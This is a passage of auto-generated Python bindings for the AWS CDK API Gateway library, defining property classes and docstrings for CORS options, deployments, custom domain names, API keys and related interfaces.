"""``AWS::ApiGateway::VpcLink.TargetArns``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-targetarns
"""
return self._values.get('target_arns')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::VpcLink.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-description
"""
return self._values.get('description')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnVpcLinkProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.ConnectionType")
class ConnectionType(enum.Enum):
INTERNET = "INTERNET"
"""For connections through the public routable internet."""
VPC_LINK = "VPC_LINK"
"""For private connections between API Gateway and a network load balancer in a VPC."""
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.ContentHandling")
class ContentHandling(enum.Enum):
CONVERT_TO_BINARY = "CONVERT_TO_BINARY"
"""Converts a request payload from a base64-encoded string to a binary blob."""
CONVERT_TO_TEXT = "CONVERT_TO_TEXT"
"""Converts a request payload from a binary blob to a base64-encoded string."""
class Cors(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Cors"):
@classproperty
@jsii.member(jsii_name="ALL_METHODS")
def ALL_METHODS(cls) -> typing.List[str]:
"""All HTTP methods."""
return jsii.sget(cls, "ALL_METHODS")
@classproperty
@jsii.member(jsii_name="ALL_ORIGINS")
def ALL_ORIGINS(cls) -> typing.List[str]:
"""All origins."""
return jsii.sget(cls, "ALL_ORIGINS")
@classproperty
@jsii.member(jsii_name="DEFAULT_HEADERS")
def DEFAULT_HEADERS(cls) -> typing.List[str]:
"""The set of default headers allowed for CORS and useful for API Gateway."""
return jsii.sget(cls, "DEFAULT_HEADERS")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CorsOptions", jsii_struct_bases=[], name_mapping={'allow_origins': 'allowOrigins', 'allow_credentials': 'allowCredentials', 'allow_headers': 'allowHeaders', 'allow_methods': 'allowMethods', 'disable_cache': 'disableCache', 'expose_headers': 'exposeHeaders', 'max_age': 'maxAge', 'status_code': 'statusCode'})
class CorsOptions():
def __init__(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None):
"""
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogther use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
"""
self._values = {
'allow_origins': allow_origins,
}
if allow_credentials is not None: self._values["allow_credentials"] = allow_credentials
if allow_headers is not None: self._values["allow_headers"] = allow_headers
if allow_methods is not None: self._values["allow_methods"] = allow_methods
if disable_cache is not None: self._values["disable_cache"] = disable_cache
if expose_headers is not None: self._values["expose_headers"] = expose_headers
if max_age is not None: self._values["max_age"] = max_age
if status_code is not None: self._values["status_code"] = status_code
@property
def allow_origins(self) -> typing.List[str]:
"""Specifies the list of origins that are allowed to make requests to this resource.
If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or
``[ * ]``.
Responses will include the ``Access-Control-Allow-Origin`` response header.
If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will
also be included.
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin
"""
return self._values.get('allow_origins')
@property
def allow_credentials(self) -> typing.Optional[bool]:
"""The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include".
When a request's credentials mode (Request.credentials) is "include",
browsers will only expose the response to frontend JavaScript code if the
Access-Control-Allow-Credentials value is true.
Credentials are cookies, authorization headers or TLS client certificates.
default
:default: false
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials
"""
return self._values.get('allow_credentials')
@property
def allow_headers(self) -> typing.Optional[typing.List[str]]:
"""The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request.
default
:default: Cors.DEFAULT_HEADERS
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Headers
"""
return self._values.get('allow_headers')
@property
def allow_methods(self) -> typing.Optional[typing.List[str]]:
"""The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request.
If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``.
default
:default: Cors.ALL_METHODS
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Methods
"""
return self._values.get('allow_methods')
@property
def disable_cache(self) -> typing.Optional[bool]:
"""Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``.
default
:default: - cache is enabled
"""
return self._values.get('disable_cache')
@property
def expose_headers(self) -> typing.Optional[typing.List[str]]:
"""The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names.
If you want clients to be able to access other headers, you have to list
them using the Access-Control-Expose-Headers header.
default
:default:
- only the 6 CORS-safelisted response headers are exposed:
Cache-Control, Content-Language, Content-Type, Expires, Last-Modified,
Pragma
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Expose-Headers
"""
return self._values.get('expose_headers')
@property
def max_age(self) -> typing.Optional[aws_cdk.core.Duration]:
"""The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached.
To disable caching altogther use ``disableCache: true``.
default
:default: - browser-specific (see reference)
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Max-Age
"""
return self._values.get('max_age')
@property
def status_code(self) -> typing.Optional[jsii.Number]:
"""Specifies the response status code returned from the OPTIONS method.
default
:default: 204
"""
return self._values.get('status_code')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CorsOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class Deployment(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Deployment"):
"""A Deployment of a REST API.
An immutable representation of a RestApi resource that can be called by users
using Stages. A deployment must be associated with a Stage for it to be
callable over the Internet.
Normally, you don't need to define deployments manually. The RestApi
construct manages a Deployment resource that represents the latest model. It
can be accessed through ``restApi.latestDeployment`` (unless ``deploy: false`` is
set when defining the ``RestApi``).
If you manually define this resource, you will need to know that since
deployments are immutable, as long as the resource's logical ID doesn't
change, the deployment will represent the snapshot in time in which the
resource was created. This means that if you modify the RestApi model (i.e.
add methods or resources), these changes will not be reflected unless a new
deployment resource is created.
To achieve this behavior, the method ``addToLogicalId(data)`` can be used to
augment the logical ID generated for the deployment resource such that it
will include arbitrary data. This is done automatically for the
``restApi.latestDeployment`` deployment.
Furthermore, since a deployment does not reference any of the REST API
resources and methods, CloudFormation will likely provision it before these
resources are created, which means that it will represent a "half-baked"
model. Use the ``node.addDependency(dep)`` method to circumvent that. This is done
automatically for the ``restApi.latestDeployment`` deployment.
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api: "IRestApi", description: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api: The Rest API to deploy.
:param description: A description of the purpose of the API Gateway deployment. Default: - No description.
:param retain_deployments: When an API Gateway model is updated, a new deployment will automatically be created. If this is true (default), the old API Gateway Deployment resource will not be deleted. This will allow manually reverting back to a previous deployment in case for example. Default: false
"""
props = DeploymentProps(api=api, description=description, retain_deployments=retain_deployments)
jsii.create(Deployment, self, [scope, id, props])
@jsii.member(jsii_name="addToLogicalId")
def add_to_logical_id(self, data: typing.Any) -> None:
"""Adds a component to the hash that determines this Deployment resource's logical ID.
This should be called by constructs of the API Gateway model that want to
invalidate the deployment when their settings change. The component will
be resolve()ed during synthesis so tokens are welcome.
:param data: -
"""
return jsii.invoke(self, "addToLogicalId", [data])
@property
@jsii.member(jsii_name="api")
def api(self) -> "IRestApi":
return jsii.get(self, "api")
@property
@jsii.member(jsii_name="deploymentId")
def deployment_id(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "deploymentId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DeploymentProps", jsii_struct_bases=[], name_mapping={'api': 'api', 'description': 'description', 'retain_deployments': 'retainDeployments'})
class DeploymentProps():
def __init__(self, *, api: "IRestApi", description: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None):
"""
:param api: The Rest API to deploy.
:param description: A description of the purpose of the API Gateway deployment. Default: - No description.
:param retain_deployments: When an API Gateway model is updated, a new deployment will automatically be created. If this is true (default), the old API Gateway Deployment resource will not be deleted. This will allow manually reverting back to a previous deployment in case for example. Default: false
"""
self._values = {
'api': api,
}
if description is not None: self._values["description"] = description
if retain_deployments is not None: self._values["retain_deployments"] = retain_deployments
@property
def api(self) -> "IRestApi":
"""The Rest API to deploy."""
return self._values.get('api')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the API Gateway deployment.
default
:default: - No description.
"""
return self._values.get('description')
@property
def retain_deployments(self) -> typing.Optional[bool]:
"""When an API Gateway model is updated, a new deployment will automatically be created. If this is true (default), the old API Gateway Deployment resource will not be deleted. This will allow manually reverting back to a previous deployment in case for example.
default
:default: false
"""
return self._values.get('retain_deployments')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DeploymentProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DomainNameAttributes", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'domain_name_alias_hosted_zone_id': 'domainNameAliasHostedZoneId', 'domain_name_alias_target': 'domainNameAliasTarget'})
class DomainNameAttributes():
def __init__(self, *, domain_name: str, domain_name_alias_hosted_zone_id: str, domain_name_alias_target: str):
"""
:param domain_name: The domain name (e.g. ``example.com``).
:param domain_name_alias_hosted_zone_id: Thje Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
:param domain_name_alias_target: The Route53 alias target to use in order to connect a record set to this domain through an alias.
"""
self._values = {
'domain_name': domain_name,
'domain_name_alias_hosted_zone_id': domain_name_alias_hosted_zone_id,
'domain_name_alias_target': domain_name_alias_target,
}
@property
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``)."""
return self._values.get('domain_name')
@property
def domain_name_alias_hosted_zone_id(self) -> str:
"""Thje Route53 hosted zone ID to use in order to connect a record set to this domain through an alias."""
return self._values.get('domain_name_alias_hosted_zone_id')
@property
def domain_name_alias_target(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias."""
return self._values.get('domain_name_alias_target')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameAttributes(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DomainNameOptions", jsii_struct_bases=[], name_mapping={'certificate': 'certificate', 'domain_name': 'domainName', 'endpoint_type': 'endpointType'})
class DomainNameOptions():
def __init__(self, *, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None):
"""
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
"""
self._values = {
'certificate': certificate,
'domain_name': domain_name,
}
if endpoint_type is not None: self._values["endpoint_type"] = endpoint_type
@property
def certificate(self) -> aws_cdk.aws_certificatemanager.ICertificate:
"""The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name.
For "EDGE" domain names, the certificate
needs to be in the US East (N. Virginia) region.
"""
return self._values.get('certificate')
@property
def domain_name(self) -> str:
"""The custom domain name for your API.
Uppercase letters are not supported.
"""
return self._values.get('domain_name')
@property
def endpoint_type(self) -> typing.Optional["EndpointType"]:
"""The type of endpoint for this DomainName.
default
:default: REGIONAL
"""
return self._values.get('endpoint_type')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DomainNameProps", jsii_struct_bases=[DomainNameOptions], name_mapping={'certificate': 'certificate', 'domain_name': 'domainName', 'endpoint_type': 'endpointType', 'mapping': 'mapping'})
class DomainNameProps(DomainNameOptions):
def __init__(self, *, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None, mapping: typing.Optional["IRestApi"]=None):
"""
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
:param mapping: If specified, all requests to this domain will be mapped to the production deployment of this API. If you wish to map this domain to multiple APIs with different base paths, don't specify this option and use ``addBasePathMapping``. Default: - you will have to call ``addBasePathMapping`` to map this domain to API endpoints.
"""
self._values = {
'certificate': certificate,
'domain_name': domain_name,
}
if endpoint_type is not None: self._values["endpoint_type"] = endpoint_type
if mapping is not None: self._values["mapping"] = mapping
@property
def certificate(self) -> aws_cdk.aws_certificatemanager.ICertificate:
"""The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name.
For "EDGE" domain names, the certificate
needs to be in the US East (N. Virginia) region.
"""
return self._values.get('certificate')
@property
def domain_name(self) -> str:
"""The custom domain name for your API.
Uppercase letters are not supported.
"""
return self._values.get('domain_name')
@property
def endpoint_type(self) -> typing.Optional["EndpointType"]:
"""The type of endpoint for this DomainName.
default
:default: REGIONAL
"""
return self._values.get('endpoint_type')
@property
def mapping(self) -> typing.Optional["IRestApi"]:
"""If specified, all requests to this domain will be mapped to the production deployment of this API.
If you wish to map this domain to multiple APIs
with different base paths, don't specify this option and use
``addBasePathMapping``.
default
:default:
- you will have to call ``addBasePathMapping`` to map this domain to
API endpoints.
"""
return self._values.get('mapping')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.EndpointType")
class EndpointType(enum.Enum):
EDGE = "EDGE"
"""For an edge-optimized API and its custom domain name."""
REGIONAL = "REGIONAL"
"""For a regional API and its custom domain name."""
PRIVATE = "PRIVATE"
"""For a private API and its custom domain name."""
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.HttpIntegrationProps", jsii_struct_bases=[], name_mapping={'http_method': 'httpMethod', 'options': 'options', 'proxy': 'proxy'})
class HttpIntegrationProps():
def __init__(self, *, http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, proxy: typing.Optional[bool]=None):
"""
:param http_method: HTTP method to use when invoking the backend URL. Default: GET
:param options: Integration options, such as request/resopnse mapping, content handling, etc. Default: defaults based on ``IntegrationOptions`` defaults
:param proxy: Determines whether to use proxy integration or custom integration. Default: true
"""
if isinstance(options, dict): options = IntegrationOptions(**options)
self._values = {
}
if http_method is not None: self._values["http_method"] = http_method
if options is not None: self._values["options"] = options
if proxy is not None: self._values["proxy"] = proxy
@property
def http_method(self) -> typing.Optional[str]:
"""HTTP method to use when invoking the backend URL.
default
:default: GET
"""
return self._values.get('http_method')
@property
def options(self) -> typing.Optional["IntegrationOptions"]:
"""Integration options, such as request/resopnse mapping, content handling, etc.
default
:default: defaults based on ``IntegrationOptions`` defaults
"""
return self._values.get('options')
@property
def proxy(self) -> typing.Optional[bool]:
"""Determines whether to use proxy integration or custom integration.
default
:default: true
"""
return self._values.get('proxy')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'HttpIntegrationProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IApiKey")
class IApiKey(aws_cdk.core.IResource, jsii.compat.Protocol):
"""API keys are alphanumeric string values that you distribute to app developer customers to grant access to your API."""
@staticmethod
def __jsii_proxy_class__():
return _IApiKeyProxy
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""The API key ID.
attribute:
:attribute:: true
"""
...
class _IApiKeyProxy(jsii.proxy_for(aws_cdk.core.IResource)):
"""API keys are alphanumeric string values that you distribute to app developer customers to grant access to your API."""
__jsii_type__ = "@aws-cdk/aws-apigateway.IApiKey"
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""The API key ID.
attribute:
:attribute:: true
"""
return jsii.get(self, "keyId")
@jsii.implements(IApiKey)
class ApiKey(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.ApiKey"):
"""An API Gateway ApiKey.
An ApiKey can be distributed to API clients that are executing requests
for Method resources that require an Api Key.
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key_name: typing.Optional[str]=None, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[bool]=None, generate_distinct_id: typing.Optional[bool]=None, resources: typing.Optional[typing.List["RestApi"]]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api_key_name: A name for the API key. If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the API key name. Default: automically generated name
:param customer_id: An AWS Marketplace customer identifier to use when integrating with the AWS SaaS Marketplace. Default: none
:param description: A description of the purpose of the API key. Default: none
:param enabled: Indicates whether the API key can be used by clients. Default: true
:param generate_distinct_id: Specifies whether the key identifier is distinct from the created API key value. Default: false
:param resources: A list of resources this api key is associated with. Default: none
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = ApiKeyProps(api_key_name=api_key_name, customer_id=customer_id, description=description, enabled=enabled, generate_distinct_id=generate_distinct_id, resources=resources, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(ApiKey, self, [scope, id, props])
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""The API key ID."""
return jsii.get(self, "keyId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IAuthorizer")
class IAuthorizer(jsii.compat.Protocol):
"""Represents an API Gateway authorizer."""
@staticmethod
def __jsii_proxy_class__():
return _IAuthorizerProxy
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> str:
"""The authorizer ID."""
...
class _IAuthorizerProxy():
"""Represents an API Gateway authorizer."""
__jsii_type__ = "@aws-cdk/aws-apigateway.IAuthorizer"
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> str:
"""The authorizer ID."""
return jsii.get(self, "authorizerId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IDomainName")
class IDomainName(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IDomainNameProxy
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``).
attribute:
:attribute:: DomainName
"""
...
@property
@jsii.member(jsii_name="domainNameAliasDomainName")
def domain_name_alias_domain_name(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionDomainName,RegionalDomainName
"""
...
@property
@jsii.member(jsii_name="domainNameAliasHostedZoneId")
def domain_name_alias_hosted_zone_id(self) -> str:
"""The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionHostedZoneId,RegionalHostedZoneId
"""
...
class _IDomainNameProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IDomainName"
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``).
attribute:
:attribute:: DomainName
"""
return jsii.get(self, "domainName")
@property
@jsii.member(jsii_name="domainNameAliasDomainName")
def domain_name_alias_domain_name(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionDomainName,RegionalDomainName
"""
return jsii.get(self, "domainNameAliasDomainName")
@property
@jsii.member(jsii_name="domainNameAliasHostedZoneId")
def domain_name_alias_hosted_zone_id(self) -> str:
"""The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionHostedZoneId,RegionalHostedZoneId
"""
return jsii.get(self, "domainNameAliasHostedZoneId")
@jsii.implements(IDomainName)
class DomainName(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.DomainName"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, mapping: typing.Optional["IRestApi"]=None, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param mapping: If specified, all requests to this domain will be mapped to the production deployment of this API. If you wish to map this domain to multiple APIs with different base paths, don't specify this option and use ``addBasePathMapping``. Default: - you will have to call ``addBasePathMapping`` to map this domain to API endpoints.
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
"""
props = DomainNameProps(mapping=mapping, certificate=certificate, domain_name=domain_name, endpoint_type=endpoint_type)
jsii.create(DomainName, self, [scope, id, props])
@jsii.member(jsii_name="fromDomainNameAttributes")
@classmethod
def from_domain_name_attributes(cls, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, domain_name_alias_hosted_zone_id: str, domain_name_alias_target: str) -> "IDomainName":
"""Imports an existing domain name.
:param scope: -
:param id: -
:param attrs: -
:param domain_name: The domain name (e.g. ``example.com``).
:param domain_name_alias_hosted_zone_id: Thje Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
:param domain_name_alias_target: The Route53 alias target to use in order to connect a record set to this domain through an alias.
"""
attrs = DomainNameAttributes(domain_name=domain_name, domain_name_alias_hosted_zone_id=domain_name_alias_hosted_zone_id, domain_name_alias_target=domain_name_alias_target)
return jsii.sinvoke(cls, "fromDomainNameAttributes", [scope, id, attrs])
@jsii.member(jsii_name="addBasePathMapping")
def add_base_path_mapping(self, target_api: "IRestApi", *, base_path: typing.Optional[str]=None) -> "BasePathMapping":
"""Maps this domain to an API endpoint.
:param target_api: That target API endpoint, requests will be mapped to the deployment stage.
:param options: Options for mapping to base path with or without a stage.
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
"""
options = BasePathMappingOptions(base_path=base_path)
return jsii.invoke(self, "addBasePathMapping", [target_api, options])
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``)."""
return jsii.get(self, "domainName")
@property
@jsii.member(jsii_name="domainNameAliasDomainName")
def domain_name_alias_domain_name(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias."""
return jsii.get(self, "domainNameAliasDomainName")
@property
@jsii.member(jsii_name="domainNameAliasHostedZoneId")
def domain_name_alias_hosted_zone_id(self) -> str:
"""The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias."""
return jsii.get(self, "domainNameAliasHostedZoneId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IModel")
class IModel(jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IModelProxy
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
attribute:
:attribute:: true
"""
...
class _IModelProxy():
__jsii_type__ = "@aws-cdk/aws-apigateway.IModel"
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
attribute:
:attribute:: true
"""
return jsii.get(self, "modelId")
@jsii.implements(IModel)
class EmptyModel(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.EmptyModel"):
"""Represents a reference to a REST API's Empty model, which is available as part of the model collection by default.
This can be used for mapping
JSON responses from an integration to what is returned to a client,
where strong typing is not required. In the absence of any defined
model, the Empty model will be used to return the response payload
unmapped.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Empty Schema",
"type" : "object"
}
deprecated
:deprecated: You should use
see
:see: Model.EMPTY_MODEL
stability
:stability: deprecated
"""
def __init__(self) -> None:
jsii.create(EmptyModel, self, [])
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
stability
:stability: deprecated
"""
return jsii.get(self, "modelId")
@jsii.implements(IModel)
class ErrorModel(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.ErrorModel"):
"""Represents a reference to a REST API's Error model, which is available as part of the model collection by default.
This can be used for mapping
error JSON responses from an integration to a client, where a simple
generic message field is sufficient to map and return an error payload.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Error Schema",
"type" : "object",
"properties" : {
"message" : { "type" : "string" }
}
}
deprecated
:deprecated: You should use
see
:see: Model.ERROR_MODEL
stability
:stability: deprecated
"""
def __init__(self) -> None:
jsii.create(ErrorModel, self, [])
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
stability
:stability: deprecated
"""
return jsii.get(self, "modelId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IRequestValidator")
class IRequestValidator(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IRequestValidatorProxy
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> str:
"""ID of the request validator, such as abc123.
attribute:
:attribute:: true
"""
...
class _IRequestValidatorProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IRequestValidator"
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> str:
"""ID of the request validator, such as abc123.
attribute:
:attribute:: true
"""
return jsii.get(self, "requestValidatorId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IResource")
class IResource(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IResourceProxy
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
...
@property
